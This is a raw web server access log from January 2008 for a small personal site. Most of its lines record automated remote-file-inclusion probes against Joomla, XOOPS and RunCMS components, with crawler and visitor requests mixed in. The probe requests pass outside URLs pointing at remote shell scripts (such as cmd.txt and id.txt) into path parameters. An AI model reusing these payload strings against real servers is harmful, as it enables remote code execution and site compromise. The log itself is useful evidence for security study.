66.7.205.39 - - [06/Jan/2008:19:59:20 -0800] "GET /logs//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.237.144.235 - - [06/Jan/2008:20:03:08 -0800] "GET /logs/access_071229.log//index.php?_REQUEST=&_REQUEST[option]=com_rsgallery&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.crewfuck.kit.net/eval/safealba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
80.237.144.235 - - [06/Jan/2008:20:03:09 -0800] "GET /logs/access_071229.log//index.php?_REQUEST=&_REQUEST[option]=com_rsgallery&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://phila.wonbuddhism.info/bbs//skin/zero_vote/images/btn_black.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
80.237.144.235 - - [06/Jan/2008:20:03:09 -0800] "GET //index.php?_REQUEST=&_REQUEST[option]=com_rsgallery&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.crewfuck.kit.net/eval/safealba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
80.237.144.235 - - [06/Jan/2008:20:03:09 -0800] "GET //index.php?_REQUEST=&_REQUEST[option]=com_rsgallery&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://phila.wonbuddhism.info/bbs//skin/zero_vote/images/btn_black.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
80.237.144.235 - - [06/Jan/2008:20:03:10 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_rsgallery&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.crewfuck.kit.net/eval/safealba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
80.237.144.235 - - [06/Jan/2008:20:03:10 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_rsgallery&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://phila.wonbuddhism.info/bbs//skin/zero_vote/images/btn_black.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
72.249.30.130 - - [06/Jan/2008:20:03:20 -0800] "GET /index.php?option=com_joomlaxplorer_OLD&Itemid=&mosConfig_absolute_path=http://www.humanesociety.com/media/phpbo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
72.249.30.130 - - [06/Jan/2008:20:03:20 -0800] "GET /logs/index.php?option=com_joomlaxplorer_OLD&Itemid=&mosConfig_absolute_path=http://www.humanesociety.com/media/phpbo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
67.18.210.122 - - [06/Jan/2008:20:08:08 -0800] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://test.krik.no/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.19.167 - - [06/Jan/2008:20:09:27 -0800] "GET /presto/?N=D HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
66.7.205.39 - - [06/Jan/2008:20:11:12 -0800] "GET /logs/access_071222.log//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.98.61.34 - - [06/Jan/2008:20:11:35 -0800] "GET //skin/zero_vote/error.php?dir=http://members.lycos.co.uk/zuopwn/base?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
65.98.61.34 - - [06/Jan/2008:20:11:35 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://members.lycos.co.uk/zuopwn/base?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.6.20.45 - - [06/Jan/2008:20:14:42 -0800] "GET /logs/access_071105.log HTTP/1.0" 200 54880 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
80.237.144.235 - - [06/Jan/2008:20:15:31 -0800] "GET /logs/access_071214.log//index.php?_REQUEST=&_REQUEST[option]=com_rsgallery&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.crewfuck.kit.net/eval/safealba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
80.237.144.235 - - [06/Jan/2008:20:15:32 -0800] "GET /logs/access_071214.log//index.php?_REQUEST=&_REQUEST[option]=com_rsgallery&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://phila.wonbuddhism.info/bbs//skin/zero_vote/images/btn_black.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
68.142.212.185 - - [06/Jan/2008:20:15:43 -0800] "GET /mobileoffice/cf_3.jpg HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [06/Jan/2008:20:16:02 -0800] "GET /mobileoffice/2c_6.jpg HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
65.98.61.34 - - [06/Jan/2008:20:16:04 -0800] "GET //skin/zero_vote/error.php?dir=http://members.lycos.co.uk/zuopwn/base?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
65.98.61.34 - - [06/Jan/2008:20:16:04 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://members.lycos.co.uk/zuopwn/base?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.177.128.128 - - [06/Jan/2008:20:16:53 -0800] "GET /logs/access_071220.log/index.php?option=com_joomlaxplorer&Itemid=&mosConfig_absolute_path=http://www.bosainternet.com/docs/boo.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.177.128.128 - - [06/Jan/2008:20:16:59 -0800] "GET /index.php?option=com_joomlaxplorer&Itemid=&mosConfig_absolute_path=http://www.bosainternet.com/docs/boo.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.177.128.128 - - [06/Jan/2008:20:17:04 -0800] "GET /logs/index.php?option=com_joomlaxplorer&Itemid=&mosConfig_absolute_path=http://www.bosainternet.com/docs/boo.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.55.148.27 - - [06/Jan/2008:20:17:37 -0800] "GET /logs/index.php?option=com_juice&Itemid=&mosConfig_absolute_path=http://www.humanesociety.com/media/phpbo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
72.55.148.27 - - [06/Jan/2008:20:17:40 -0800] "GET /index.php?option=com_juice&Itemid=&mosConfig_absolute_path=http://www.humanesociety.com/media/phpbo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
71.136.51.92 - - [06/Jan/2008:20:18:14 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000300.jpg HTTP/1.1" 304 - "http://gotla.guildportal.com/Guild.aspx?GuildID=80731&TabID=695681" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
71.136.51.92 - - [06/Jan/2008:20:18:15 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000299.jpg HTTP/1.1" 304 - "http://gotla.guildportal.com/Guild.aspx?GuildID=80731&TabID=695681" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
71.136.51.92 - - [06/Jan/2008:20:18:17 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000295.jpg HTTP/1.1" 304 - "http://gotla.guildportal.com/Guild.aspx?GuildID=80731&TabID=695681" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
71.136.51.92 - - [06/Jan/2008:20:18:18 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000292.jpg HTTP/1.1" 304 - "http://gotla.guildportal.com/Guild.aspx?GuildID=80731&TabID=695681" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
71.136.51.92 - - [06/Jan/2008:20:18:21 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000281.jpg HTTP/1.1" 304 - "http://gotla.guildportal.com/Guild.aspx?GuildID=80731&TabID=695681" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
68.142.212.185 - - [06/Jan/2008:20:20:37 -0800] "GET /mobileoffice/99_8.jpg HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [06/Jan/2008:20:20:58 -0800] "GET /mobileoffice/e0_3.jpg HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [06/Jan/2008:20:21:40 -0800] "GET /mobileoffice/2c_3.jpg HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [06/Jan/2008:20:21:59 -0800] "GET /mobileoffice/e0_4.jpg HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [06/Jan/2008:20:23:04 -0800] "GET /mobileoffice/ef_11.jpg HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:20:23:13 -0800] "GET /logs/access_071229.log//public/runcms//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:20:23:13 -0800] "GET //public/runcms//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:20:23:13 -0800] "GET /logs//public/runcms//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.177.128.128 - - [06/Jan/2008:20:23:27 -0800] "GET /logs/access_071229.log/index.php?option=com_joomlaxplorer&Itemid=&mosConfig_absolute_path=http://www.bosainternet.com/docs/boo.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
68.142.212.185 - - [06/Jan/2008:20:23:44 -0800] "GET /mobileoffice/94_22.jpg HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [06/Jan/2008:20:24:05 -0800] "GET /mobileoffice/DCP_0125.JPG HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
70.169.134.252 - - [06/Jan/2008:20:24:16 -0800] "GET /logs/access_071229.log//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
70.169.134.252 - - [06/Jan/2008:20:24:16 -0800] "GET //xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
70.169.134.252 - - [06/Jan/2008:20:24:16 -0800] "GET /logs//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
68.142.212.185 - - [06/Jan/2008:20:24:25 -0800] "GET /mobileoffice/DCP_0126.JPG HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
74.200.89.66 - - [06/Jan/2008:20:24:35 -0800] "GET /index.php?option=com_rsgallery&Itemid=&mosConfig_absolute_path=http://www.lotromp.com/kafegaul/cmd.do? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
68.142.212.185 - - [06/Jan/2008:20:24:45 -0800] "GET /mobileoffice/DCP_0127.JPG HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [06/Jan/2008:20:25:06 -0800] "GET /mobileoffice/DCP_0128.JPG HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [06/Jan/2008:20:25:30 -0800] "GET /mobileoffice/2c_12_sb.jpg HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [06/Jan/2008:20:25:51 -0800] "GET /mobileoffice/Picture_011.jpg HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
163.27.43.2 - - [06/Jan/2008:20:26:22 -0800] "GET /logs/access_071214.log//skin/zero_vote/ask_password.php?dir=http://www.geocities.com/mobileuser.22844354/asia/asia.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
163.27.43.2 - - [06/Jan/2008:20:26:23 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.geocities.com/mobileuser.22844354/asia/asia.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.18.210.122 - - [06/Jan/2008:20:26:43 -0800] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://test.krik.no/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:20:26:45 -0800] "GET /logs/access_071229.log//public/runcms//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:20:26:45 -0800] "GET //public/runcms//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:20:26:45 -0800] "GET /logs//public/runcms//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
68.142.212.185 - - [06/Jan/2008:20:26:55 -0800] "GET /mobileoffice/Picture_012.jpg HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [06/Jan/2008:20:27:48 -0800] "GET /mobileoffice/Picture_006.jpg HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [06/Jan/2008:20:28:20 -0800] "GET /mobileoffice/Picture_017.jpg HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
67.18.210.122 - - [06/Jan/2008:20:28:36 -0800] "GET /logs/access_071229.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://test.krik.no/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.18.210.122 - - [06/Jan/2008:20:28:36 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://test.krik.no/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
204.15.135.138 - - [06/Jan/2008:20:28:40 -0800] "GET /index.php?option=com_rsgallery&Itemid=&mosConfig_absolute_path=www.lotromp.com/kafegaul/cmd.do? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:20:28:51 -0800] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:20:28:51 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:20:28:51 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
68.142.212.185 - - [06/Jan/2008:20:29:01 -0800] "GET /mobileoffice/Picture_007.jpg HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [06/Jan/2008:20:29:42 -0800] "GET /mobileoffice/Picture_004.jpg HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [06/Jan/2008:20:30:23 -0800] "GET /mobileoffice/Picture_013.jpg HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:20:30:52 -0800] "GET /logs/access_071229.log//runcms/modules/newbb_plus/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:20:30:52 -0800] "GET //runcms/modules/newbb_plus/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:20:30:52 -0800] "GET /logs//runcms/modules/newbb_plus/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
68.142.212.185 - - [06/Jan/2008:20:31:05 -0800] "GET /mobileoffice/Picture_009.jpg HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:20:31:10 -0800] "GET /logs/access_071229.log//runcms/modules/newbb_plus/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:20:31:10 -0800] "GET //runcms/modules/newbb_plus/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:20:31:10 -0800] "GET /logs//runcms/modules/newbb_plus/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
68.142.212.185 - - [06/Jan/2008:20:31:26 -0800] "GET /mobileoffice/Picture_010.jpg HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
67.18.210.122 - - [06/Jan/2008:20:31:27 -0800] "GET /logs/access_071214.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://test.krik.no/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
68.142.212.185 - - [06/Jan/2008:20:31:46 -0800] "GET /mobileoffice/Picture_014.jpg HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [06/Jan/2008:20:32:30 -0800] "GET /mobileoffice/Picture_015.jpg HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [06/Jan/2008:20:32:56 -0800] "GET /mobileoffice/Picture_008.jpg HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:20:33:20 -0800] "GET /logs/access_071222.log//runcms/modules/newbb_plus/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
68.142.212.185 - - [06/Jan/2008:20:33:21 -0800] "GET /mobileoffice/Picture_003.jpg HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [06/Jan/2008:20:33:45 -0800] "GET /mobileoffice/Picture_002.jpg HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:20:33:47 -0800] "GET /logs/access_071229.log//public/runcms//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:20:33:47 -0800] "GET //public/runcms//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:20:33:47 -0800] "GET /logs//public/runcms//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
71.136.51.92 - - [06/Jan/2008:20:36:26 -0800] "GET /bikes/dteel/EQ2/Screenshots/ HTTP/1.1" 200 7116 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
71.136.51.92 - - [06/Jan/2008:20:36:28 -0800] "GET /bikes/dteel/EQ2/ HTTP/1.1" 200 841 "http://www.dmulk.com/bikes/dteel/EQ2/Screenshots/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
71.136.51.92 - - [06/Jan/2008:20:36:30 -0800] "GET /bikes/dteel/EQ2/Fraaxia_thumb.jpg HTTP/1.1" 200 26169 "http://www.dmulk.com/bikes/dteel/EQ2/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:20:36:48 -0800] "GET /logs/access_071222.log//runcms/modules/newbb_plus/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:20:38:14 -0800] "GET /logs/access_071212.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.231.1.130 - - [06/Jan/2008:20:40:23 -0800] "GET /logs/access_071222.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://army5.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:20:46:25 -0800] "GET /logs/access_071229.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:20:46:25 -0800] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:20:46:25 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:20:46:33 -0800] "GET /logs/access_071229.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:20:46:33 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:20:46:33 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.249.70.241 - - [06/Jan/2008:20:47:03 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "Googlebot-Image/1.0" "www.dmulk.com"
66.249.70.241 - - [06/Jan/2008:20:47:03 -0800] "GET /minamijewelry/html/images/minami_jewelry_lg.jpg HTTP/1.1" 200 4890 "-" "Googlebot-Image/1.0" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:20:50:15 -0800] "GET /logs/access_071222.log//public/runcms//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.27.78 - - [06/Jan/2008:20:54:54 -0800] "GET /bikes/dteel/MVI_2434.AVI HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
70.169.134.252 - - [06/Jan/2008:20:56:51 -0800] "GET /logs/access_071222.log//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:20:56:55 -0800] "GET /logs/access_071229.log//runcms/modules/newbb_plus/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:20:56:55 -0800] "GET //runcms/modules/newbb_plus/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:20:56:55 -0800] "GET /logs//runcms/modules/newbb_plus/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:20:58:17 -0800] "GET /logs/access_071229.log//runcms/modules/newbb_plus/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
